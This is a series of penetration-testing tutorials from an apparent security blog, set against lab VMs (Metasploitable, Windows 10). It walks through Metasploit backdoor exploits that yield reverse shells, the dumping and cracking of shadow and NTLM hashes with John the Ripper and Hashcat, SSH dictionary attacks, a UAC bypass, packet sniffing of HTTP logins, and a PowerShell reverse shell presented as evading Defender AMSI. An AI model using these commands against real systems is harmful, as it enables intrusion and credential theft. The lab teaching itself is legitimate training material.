Cracking Linux passwords with John The Ripper

In our previous tutorial we gained root access to our target Linux machine running metasploitable. So now what can we do? Let’s try to crack some passwords and system credentials.

First thing is to grab the password hashes. This is simply done by typing

cat /etc/passwd

We get an output like above. Select the results, copy and paste a text file which we will save as passwd.txt on our Kali machine.

Next we do the same for the shadow file run the command

cat /etc/shadow

and then copy the results to a text file which is saved as shadow.txt

We now have 2 text files saved on our Linux machine. The next thing we will do is combine the two files together using John The Ripper tools so it can then be cracked.

Run the following command

┌──(kali㉿kali)-[~]
└─$ unshadow /home/kali/Desktop/passwd /home/kali/Desktop/shadow > /home/kali/Desktop/passwords.db 

Replace the directory string to be where you saved the passwd and shadow .txt files.

Now the files are combined, we will run a dictionary attack to try and crack the hashes. We will use the popular rockyou.txt dictionary of passwords.

┌──(kali㉿kali)-[~]
└─$ sudo john --wordlist=/home/kali/Desktop/rockyou.txt /home/kali/Desktop/passwords.db 

we define the wordlist to use, it’s location and the location of our combined passwd and shadow file.

It can take some time to run through the whole dictionary of thousands of words. Above we can see the results of 4 accounts, and we have identified the administrator account msfadmin is the username and password. Press ctrl + c to cancel cracking anymore.

We can always see what has been cracked already by using the command

sudo john /home/kali/Desktop/passwords.db --show 

This will show us what has been cracked already and what is pending. You can see we have 4 cracked and 3 pending.

If you run the crack command again, it will continue trying to crack the remaining 3.

Of course if the password you are trying to crack doesn’t exist in your dictionary, it will fine no results. There are some huge dictionaries available online for download that contain many potential and common passwords.

So what did we learn from this tutorial? Well, it’s important to secure your system. Use some kind of random password for strong security. Combine it with upper and lower cases, special characters. If someone is running a dictionary attack to try and crack the password the likelihood of a random string combination being in the dictionary is far less than using an actual word.

If you followed this tutorial from the previous, you will see that we were able to gain root access, grab the hashes, and crack them all because of one security hole. The vulnerable unrealIRC that was exploited.

Now we have the passwords, there are other services we have seen running on our Metasploitable machine that could be vulnerable. Some of these services will require us to enter username and passwords in order to exploit. Now we have those to hand we can explore other vulnerabilities we can exploit.

Advertisement

Hack Metasploitable with UnrealIRC backdoor

Metasploitable is an OS with baked in vulnerabilities for you to practice exploits using Metasploit. In this tutorial we will be taking a look at ow to gain a reverse shell on our target machine by exploiting the UnrealIRC backdoor.

What is IRC?

IRC means Internet Relay Chat, it is a messaging service that was quite popular in the early 2000’s, but since 2003 has steadily declined in use. There are however still a significant number of people using IRC, so there is a good chance you may come across this potential vulnerability. Back in June of 2010 the IRC servers were hacked and the download was replaced by a version that had been compromised with a trojan backdoor. If someone is running this version, it’s a security hole.

The nice thing about this vulnerability is that it is not a standard service that is likely to have been patched already. In a real life situation is is much more likely you will find a hole that has not been patched in a third party application than in the OS.

To begin with start up your Metasploitable virtual machine, and Kali Linux virtual machine. Then we will run nmap to see what services and ports are available.

┌──(kali㉿kali)-[~]
└─$ nmap 10.0.2.0/24 

we will see that our Metasploitable virtual machine has lots of ports and services running.

Our target machine is on IP address 10.0.2.7 and you can see on for 6667 the IRC service is running.

Now if we run the following command

└─$ nmap --script irc-unrealircd-backdoor.nse 10.0.2.7 -p 6667

This will test if the IRC version installed is vulnerable by running a time based ping command and seeing how long it takes to respond.

The result printed in the terminal shows that it is likely the unrealIRCd that is installed is likely to be exploitable. We can find more details by visiting :

http://seclists.org/fulldisclosure/2010/Jun/277

So now we know that our target machine is likely to be penetrated through this service. Let’s start Metasploit by typing msfconsole

Now type search irc and you will see several results.

The one we are interested in is the unreal irc backdoor, which is number 14 on the list. So type use 14.

Now we need to decide on our payload. To see the available compatible payloads use show payloads and you will see several options for this.

We will go with a unix reverse shell. Set the payload with set payload cmd/unix/reverse

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse

Now type options to see what settings are available.

We need to set the RHOSTS and the LHOST. The LHOST is our Kali Linux IP address, the RHOSTS is the target machine IP address. You can se thee port is defaulted already to 6667.

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set LHOST 10.0.2.15
LHOST => 10.0.2.15
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS 10.0.2.7
RHOSTS => 10.0.2.7

Now type options again and you should see the details are filled in.

Now it’s a simple matter of typing exploit to get the reverse shell.

Now we can check that level of user access w have by typing whoami and we can see it responds with root. Meaning we have full root access to the target machine.

whoami
root
id
uid=0(root) gid=0(root)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

We can also get other information like the user ID, and the details of the system OS.

This is a pretty simple exploit to get to grips with, and shows how important it is to always run the latest versions of third party applications and your OS. IRC took down the vulnerable version immediately but not before thousands had already downloaded it.

Cracking SSH Password on Metasploitable

Metasploitable as we explored in previous blog posts is made to be exploited. Ideal for those learning penetration testing and wanting to become familiar with the procedures, and techniques.

In this article we will look at how we can exploit a vulnerability in SSH that allows us to obtain the root user password.

The first thing we need to do though is obtain the username. We can do this using nmap

By running an nmap scan on our network we can find out target machine on IP address 10.0.2.6

──(kali㉿kali)-[~]
└─$ nmap 10.0.2.0/24

On 10.0.2.6, which is our metapsloitable target machine, we see the services and ports available.

┌──(kali㉿kali)-[~]
└─$ nmap -script smb-enum-users.nse -p 445 10.0.2.6

Next run the above command. This will run a script on the target host IP address. The port 445 is used as we can see it is open on the nmap scan that will enumerate all the user ID’s on the target machine. The result is below.

You can see that there is an account that is not disabled named msfadmin. Now armed with this information cracking the password will be much easier.

We will run an attack known as a dictionary attack. I am using the easy to find rockyou.txt with contains a huge list of common passwords. We will use a built in function of metasploit to scan this list and try each password against the username we have found until it gets a result.

Go ahead and open up a terminal window and start up metasploit with the msfconsole command. Then load up the ssh_login module.

msf6 > use auxiliary/scanner/ssh/ssh_login

Now type options and you can see several parameters we need to set.

We need to set the RHOSTS to 10.0.2.6, our target machine. RPORT is port 22, which as we saw in nmap is port 22 for ssh. The USERNAME we already determined is msfadmin and our USERPASS_FILE is the directory location of our rockyou.txt password list. We will also set VERBOSE too true, this means the results will be displayed for each tested password. STOP_ON_SUCCESS should also be set too true.

msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 10.0.2.6
RHOSTS => 10.0.2.6

msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /home/kali/Desktop/rockyou.txt
PASS_FILE => /home/kali/Desktop/rockyou.txt

msf6 auxiliary(scanner/ssh/ssh_login) > set verbose true
verbose => true

msf6 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true

msf6 auxiliary(scanner/ssh/ssh_login) > set USERNAME msfadmin
USERNAME => msfadmin

Now all options are set, it’s a matter of typing run and letting the script run through each line in the rockyou.txt dictionary of passwords. It may take some time, depends on how far through the dictionary your password is (assuming it is there at all!). I made sure for purposes of the exercise that the password was included in the rockyou.txt file by manually adding msfadmin password after a few hundred lines, and as you can see below it was picked up as a positive result.

So there you have it, a simple introduction to the basics of how to find a Linux username, and crack the password using metasploit. Of course this is purely an exercise, and in real life target machines will NOT be this easy. This blog is for educational purposes only, to help you understand why it’s important to secure your machines, and also give practice to those embarking upon a career in ethical hacking and penetration testing.

Metasploitable FTP Attack

Continuing from our previous tutorial on how to target a Metasploitable machine with postgresql, we will try a different attack using FTP.

In our Kali Linux machine we have already run nmap and identified our target machine. It has FTP port 21 open.

Metasploitable is running vsftp. If a username is sent that ends in the sequence :) [ a happy face ] it will open a shell on port 6200. Open a terminal and start up Metasploit with msfconsole. Once we are in type search vsftp

msf6 > search vsftp

we will see on result exploit/unix/ftp/vsftpd_234_backdoor and it’s rated “excellent”. So let’s give it a try.

msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > 

Now we will setup this exploit, type options and then we can setup the target settings.

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > options

it’s pretty simple, we need to set the target host and port. RHOSTS and RPORT

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.0.2.6
RHOSTS => 10.0.2.6

RHOSTS is the IP address of our target machine, identified as 10.0.2.6 in this case. The RPORT is the open FTP port identified in nmap as port 21, the standard FTP port.

Now simply type exploit and hit enter.

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

The exploit script will run and a connection made giving you a linux shell.

Now let’s check what files and directories there are with dir

We cold now remotely shutdown the system with the standard linux command poweroff

and that’s all folks! Another Metasploitable exploit. of course this information is given for educational purposes only. We illustrate how easy it is for people to gain access to your system if you leave it unsecured. Also, for those who are engaged in ethical hacking and penetration testing, it is important to learn the various exploits available, and be familiar with their execution. That way you will identify them on your target machines and be able to advise your client of the exposure there system has.

Exploiting postgresql with Metasploit

So let’s assume you have your metapsloitable target machine setup and we are in Kali Linux. we know our network range is 10.0.2.xx so first thing to do is run nmap to discover what is on our network and what ports are open.

┌──(kali㉿kali)-[~]
└─$ nmap 10.0.2.0/24 

we will see all the machines on our virtual box network, and we should see that our metasploitable machine has lots of services and ports open ready for our attack. Metasploitable is a target machine we can use in our pentest lab to practice and learn about the various vulnerabilities. You will then be able to recognize these on “real targets” later, if they have specific ports or services running, you will already have the knowledge of where to attack.

In the above we can see that the IP address of our target machine is 10.0.2.6 and all the ports and services that are running. In this case we will try to target the postgresql service on port 5432.

Open up a new terminal window and start msfconsole

┌──(kali㉿kali)-[~]
└─$ msfconsole 

Now type search postgresql to see all the available tools in metasploit framework that are related to postgresql.

In this instance we will use the linux exploit postgres_payload which is number 8 on the list and has an excellent rank, meaning a high chance of success. So type use 8

msf6 > use 8
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/postgres/postgres_payload) > 

Metasploit will default to use the linux meterpreter payload. now type options to view the settings you need to enter before running the exploit.

We need to setup the LHOST, LPORT the RHOSTS and the RPORT

LHOST and LPORT is the port and IP address of our Kali Linux machine that will host the service.

RHOSTS and RPORT is our target machine. So go ahead and set these up. The RPORT should be the same port that is open on the postgresql service we found in nmap.

msf6 exploit(linux/postgres/postgres_payload) > set LHOST 10.0.2.15
LHOST => 10.0.2.15
msf6 exploit(linux/postgres/postgres_payload) > set LPORT 4444
LPORT => 4444
msf6 exploit(linux/postgres/postgres_payload) > set RHOSTS 10.0.2.6
RHOSTS => 10.0.2.6
msf6 exploit(linux/postgres/postgres_payload) > set RPORT 5432

run options command again and you will see everything is filled in.

Now it’s a simple matter of typing exploit and hitting enter.

msf6 exploit(linux/postgres/postgres_payload) > exploit

You should now be in a meterpreter shell

to confirm type sysinfo to get the details of the system we are now connected to

meterpreter > sysinfo
Computer     : metasploitable.localdomain
OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 

Congratulations, you have successfully exploited the postgresql vulnerability and have control of the system.

Metasploitable

What is Metasploitable?

If you are starting out in pentesting you will need a vulnerable machine to use as a target. As you get better and your understanding deepens you will be able to start trying to penetrate more secure systems. However, at the beginning of you pentest journey you will need a less secure machine to test your skills.

If you are getting started with Kali Linux and using Metasploit, you can get frustrated when you don’t get a shell opening up. Especially if you are targeting the latest patch versions of windows, almost all the vulnerabilities in Metasploit are not going to work! They are publicly available vulnerabilities and have been patched already. So until you are good enough to write you down zero-day exploits, you are limited to the tools and scripts built into metasploit.

That is where Metasploitable comes in. This is a linux machine that has been built with specific vulnerabilities already baked in. You can run this on a VM machine in a closed network with your Kali Linux installation and practice exploiting the vulnerabilities. This is as good a place to start as any. With this lab setup you will start to become familiar with the various exploits available, the basics of using Metasploit, the Meterpreter and shell windows. Once you are inside the target machine, what can you do, and how do you proceed? Simply getting a connection is only the beginning!

So how to setup metasploitable on your virtual box?

First go here and download it :-

https://sourceforge.net/projects/metasploitable/

Once you have the zip file downloaded, extract it. Open up virtual box, and create a new machine.

Name it (I use the name Metasploitable) and select a Linux type, with Linux Other 64 bit version.

Next just use thee default settings for the virtual memory

Now you will select to use an existing virtual disk

and then click the folder icon and navigate to your extruded metasploitable image.

Now click create, and you will fid your new virtual machine is setup.

Now the final thing we will do is setup the network so it’s part of our virtual network with our other virtual box machines. Click the settings and go to the network panel. Change from NAT to NAT Network and select the network name we are using for our virtual machine network.

Now you can start up your metasploitable machine, and login using the following

uName: msfadmin

pWord: msfadmin

now you will be able to hope over to your Kali Linux and run a NMAP, you will see your metasploitable system with all the ports and services open ready for attack.

Wireshark – Packet Sniffing Passwords

Wireshark comes packaged in Kali Linux, and is a useful packet sniffer. Basically it will capture all the network packets that are transferred on a given network. This is a good example of why you should not use public wifi hotspots to login to websites.

There is a caveat, almost any website worth anything these days uses HTTPS, and Wireshark will be of no use. For the purposes of this tutorial, I’m going to give an example of how easy it is when using an unsecured HTTP connection for someone to steal your username and password.

So first fire up Wireshark in Kali Linux, you will need to select your network adapter and then you will have a screen like this

Now you are capturing packets, if there is lots of network traffic going on (most likely if you are on public wifi) you will see a LOT of data being displayed. Let’s jump over to our web browser and attempt to login to a website that has unsecured login with HTTP. Go to http://www.techpanda.org

You can see when we load the website Wireshark has captured lots of packets.

Now login using the following :

uName: admin@google.com

pWord: Password2010

Now we are logged in, Wireshark will have captured more packets.

So now we can turn off Wireshark, and filter the packets captured to find what we are looking for. So go ahead in Wireshark and press the stop button.

Now we will apply a filter s we can cut through all the packets to narrow it down to what we are looking for.

http.request.method == POST

Use this filter, and you will be presented with a much smaller list.

When we look through the list we can find the HTTP POST that used index.php application/x.www-form-urlencoded and in the details below we can see the username and password used on this form.

So there you have it, although this was run on my local virtual machine network adapter, it could easily be run on a public wifi and capture all the packets going through that network. Imagine how easy it would be to sit in Starbucks, sniffing packets for hours, and then sifting through to see what info you can find. This kind of research could be the start of finding out more about you, identifying targets for hacks who are using unsecured passwords, identify theft and more.

The thing with this kind of password hacking is it doesn’t require any brute force attacks, dictionaries and hours of processing power. Unlock using Hashcat or John The Ripper here the users are literally giving you their password!

Kali Hashcat and John the Ripper Crack Windows Password hashdump

In our last tutorial we took a look at how to gain access to a windows machine, elevate the user privileges and then get a hashdump of the passwords for the user accounts. using Meterpreter.

Now we have a text file on our desktop of the passwords but they are in an unreadable format. This is where a tool on kali known as Hashcat and John the Ripper comes in handy. In this tutorial we will looking at how we can crack the windows 10 password we collected in the hashdump using this tool.

We have saved this .txt file on our desktop as hash.txt.

Now open a new terminal window and enter john

┌──(kali㉿kali)-[~]
└─$ john 

You will get a lot of options! Here we are going to do something really simple so we can ignore many of those options. We will explore them in future posts. For now we are going to do something straight forward.

┌──(kali㉿kali)-[~]
└─$ john --show --format=NT Desktop/hash.txt

Run the command John –show –format=NT Desktop/hash.txt

This will tell John the Ripper to crack the hashed passwords contained in our hash.txt file and display the results. So go ahead and hit enter, let us see what we get.

┌──(kali㉿kali)-[~]
└─$ john --show --format=NT Desktop/hash.txt
Administrator:Passw0rd!:500:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
DefaultAccount::503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest::501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IEUser:Passw0rd!:1000:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::

4 password hashes cracked, 2 left
                                                                                                          

We were successful in cracking the password for the IEUser and the Administrator. Both of these are the same Passw0rd! which is the default password used on the virtual box Windows 10 machine. It is cracked very quickly just a few seconds.

Now we will change the password to something a little less obvious. I also added a password hint. Now I will re-run the steps for method 2 in the previous tutorial and we will get a new hashdump as well as the password hint

Crack using Hashcat

This time we will use Hashcat to crack the password, and we will use a dictionary type attack. In this case we have the rockyou.txt dictionary. A password dictionary is basically a text file with a list of words which can be used to try and crack the password. The bigger your dictionary the more chance there is of cracking the password. You can find many of these dictionaries online, sometimes they are comprised of stolen passwords from actual websites! As my chosen password was not in the standard rockyou.txt dictionary I have added it for the purposes of this tutorial.

So, we have the rockyou.txt dictionary on our desktop, and we have the new hashdump, which I edited so there is only two passwords to crack, the Administrator and the IEUser.

Now open up a terminal window and fire off the following

hashcat -m 1000 Desktop/hash.txt Desktop/rockyou.txt

┌──(kali㉿kali)-[~]
└─$ hashcat -m 1000 Desktop/hash.txt Desktop/rockyou.txt 

We are here telling hashcat to start decrypting the hashes contained in our hash.txt file and compare them to the dictionary rockyou.txt.

And we get a result! You can see below the password that matches highlighted.

Every hash you crack is saved in a hashcat.pot file. This profile is a list of all hashes you already cracked, it saves you having to crack them again. In the above case, I already have previously cracked the administrator password using hashcat, so it’s in my profile. if I run the same command again I will get a message informing me all passwords are already saved.

So if we run the command with –show added

┌──(kali㉿kali)-[~]
└─$ hashcat -m 1000 --show Desktop/hash.txt Desktop/rockyou.txt

we will get the output of all the saved hashes that we have cracked already for this file.

Crack using John The Ripper

Just for the sake of completeness, I’ll show you that I was also able to get this using the same dictionary with John The Ripper

┌──(kali㉿kali)-[~]
└─$ john --format=NT Desktop/hash.txt --wordlist=Desktop/rockyou.txt

This gave us the output

You can see it also picked up N@ck2302 from our dictionary. John The Ripper also stores a list of all previously cracked hashes so you won’t waste time cracking them again. You can run the following command

┌──(kali㉿kali)-[~]
└─$ john --show --format=NT Desktop/hash.txt

What I like about John The Ripper compared to Hashcat is it will also tell you the username that goes with the password, unlike Hashcat that seems to only keep the original hash and the password.

And that’s all folks, a pretty simple introduction to cracking hashed passwords in windows 10 retrieved from a meterpreter hashdump

Meterpreter hash dump with windows 10

So let’s assume you have been able to gain access to the target machine. In this instance I have access with meterpreter as detailed in previous tutorial. We then bypassed UAC to elevate our privileges.

$ msfconsole
msf6 > use exploit/multi/handler
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set LHOST 10.0.2.15
msf6 > set LPORT 4444
msf6 > exploit
meterpreter > getuid
meterpreter > getsystem

When we run the above you will find getsystem fails

meterpreter > getsystem
[-] 2001: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter > 

To elevate the system privileges we will bypass UAC

first we will background our active session

meterpreter > background

and then using bypassuac with fodhelper

msf6 > use exploit/windows/local/bypassuac_fodhelper
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set session 1
msf6 > set LHOST 10.0.2.4
msf6 > set LPORT 1234
msf6 > exploit

we will now be back in our active session, and be able to successfully run getsystem to elevate to full admin privileges.

Now we are ready to steal some hashes! lets see what happens when we run hashdump

It fails still

meterpreter > hashdump
[-] 2007: Operation failed: The parameter is incorrect.

What can we d to fix this and get some hashes? Well, we ned to migrate to a process that is running under system. Let’s take a look at the running processes using the ps command

meterpreter > ps

we will get a list of all running processes, we need to identify one that is running under SYSTEM user

We will use the migrate command to attach to this process.

meterpreter > migrate 248
[*] Migrating from 7720 to 248...
[*] Migration completed successfully.
meterpreter > 

Once we have migrated to this process we will run hashdump again.

meterpreter > hashdump

this time we get a result!

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IEUser:1000:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
sshd:1002:aad3b435b51404eeaad3b435b51404ee:475a7dd05810c001c892853b88ba03a9:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:f27c0c12a5c94e851d73b4ce3a77d149:::
meterpreter > 

METHOD 2

There is another way to get a hashdump using a metasploit module. Once you have control over the session and elevated permission, background the session and switch to use a new module.

meterpreter > background
msf6 > use windows/gather/hashdump
msf6 > set SESSION 2
msf6 > run

Here we have switch metasploit to use the windows/gather/hashdump exploit, attached it to our elevated admin session and then run the exploit. When we do this you will get a readout of the passwords also.

msf6 post(windows/gather/hashdump) > set SESSION 2
msf6 post(windows/gather/hashdump) > run

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 5062b47b183427f814c3cbdad04994e6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:f27c0c12a5c94e851d73b4ce3a77d149:::
IEUser:1000:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
sshd:1002:aad3b435b51404eeaad3b435b51404ee:475a7dd05810c001c892853b88ba03a9:::


[*] Post module execution completed

This can also locate password hints if available.

Now we can copy and paste these and save them to a txt file on our system for cracking.

Defeat Windows 10 with Defender AMSI

Most of the standard off the shelf packages that generate payloads on Kali Linux are useless against the latest Windows 10 Defender (as of writing it is December 2020). I was able to generate payloads that could get around the virus checks, but the problem is wen executing. Windows AMSI (Anti Malware Scan Interface) will recognize and kill the file.

After a lot of hunting around I found this

https://github.com/ivan-sincek/powershell-reverse-tcp

This is a collection of power shell scripts that will open a reverse_tcp connection. So far it’s the only thing I have managed to make work on the latest Windows 10 defender, and it defeats AMSI.

So go ahead and start up metasploit on your linux machine

$ msfconsole

and then we will use our multi handler with a windows shell.

msf6 exploit(multi/handler) > set payload windows/shell/reverse_tcp

and set the LHOST and LPORT parameters before starting the listener.

msf6 exploit(multi/handler) > set LHOST 10.0.2.15
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit

Now we will go to our windows machine and run one of the powershell_reverse_tcp.ps1 script from Ivan Sincek.

You will see that it runs successfully without any warnings despite windows defender being turned on.

On out linux machine we now have a full powershell

The script from Ivan is really excellent, and after many hours trying its of different payloads, editing payloads and so on, this was the best results I got, and it’s just “off the shelf” solution!